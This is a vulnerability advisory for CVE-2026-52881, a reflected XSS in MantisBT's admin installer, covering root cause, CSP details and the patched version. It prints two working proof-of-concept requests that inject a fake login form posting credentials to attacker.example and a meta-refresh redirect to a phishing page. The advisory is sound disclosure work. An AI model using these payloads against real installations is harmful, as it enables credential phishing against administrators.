criticalCVE-2026-52881Jul 15, 2026

CVE-2026-52881: MantisBT Reflected XSS in admin/install.php

Shubham Kandhare
Security Engagement Manager, SecureLayer7

A reflected XSS flaw in MantisBT's admin installer lets anyone craft a URL that injects HTML into the real admin page, enabling credential phishing and open redirects with no login required.

Packagemantisbt/mantisbt
Ecosystemcomposer
Affected<= 2.28.3
Fixed in2.28.4

The problem

MantisBT 2.28.3 and earlier pass six GET/POST parameters from the install form directly into `printf` calls in `admin/install.php` without HTML-encoding. The affected parameters are `hostname`, `db_username`, `db_password`, `database_name`, `admin_username`, and `admin_password`.

No authentication is needed to trigger the page. An attacker sends a crafted link to an admin, and the raw parameter value lands verbatim inside the HTML response.

Proof of concept

A working proof-of-concept for CVE-2026-52881 in mantisbt/mantisbt, with the exact payload below.

http
# Credential phishing via form injection (CSP blocks inline <script>, not raw HTML)
# Inject into the db_username parameter to overlay a fake login form on the real admin page

GET /admin/install.php?db_username=%22%3E%3C/input%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cform+action%3D%22https%3A%2F%2Fattacker.example%2Fsteal%22+method%3D%22POST%22%3E%3Ch3%3ESession+Expired+%E2%80%94+Please+Re-authenticate%3C%2Fh3%3E%3Cinput+name%3D%22user%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22pass%22+placeholder%3D%22Password%22%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E HTTP/1.1
Host: target.example

# Open redirect variant via <meta> tag (no form-action directive in old CSP)
GET /admin/install.php?db_username=%22%3E%3C/input%3E%3Cmeta+http-equiv%3D%22refresh%22+content%3D%220%3Burl%3Dhttps%3A%2F%2Fattacker.example%2Fphish%22%3E HTTP/1.1
Host: target.example

The root cause is that user-supplied install form parameters are read via `gpc_get()` and then interpolated directly into `printf()` HTML output with no `htmlspecialchars()` call. A value like `"><injected HTML` breaks out of the surrounding `<input>` attribute and injects arbitrary markup.

MantisBT's CSP sets `script-src 'self'`, so classic `<script>alert()>` payloads are blocked. However, the CSP was missing a `form-action` directive, meaning a fake `<form action="https://attacker.example">` injected into the page is fully functional. The patch wraps all six parameters in `htmlspecialchars()` before they reach `printf` and also adds `form-action 'self'` to the CSP header (CWE-79).

The fix

Upgrade to MantisBT 2.28.4 (patch commit 297773fbb238c39a153bd888431b41a176132098). If you cannot upgrade immediately, remove the `/admin` directory entirely, as the MantisBT Admin Guide recommends after installation. Removing `/admin` also eliminates the attack surface for all other installer-related issues.

Reported by McCaulay Hudson (@_McCaulay) of watchTowr.

References: [1][2][3][4]

Related research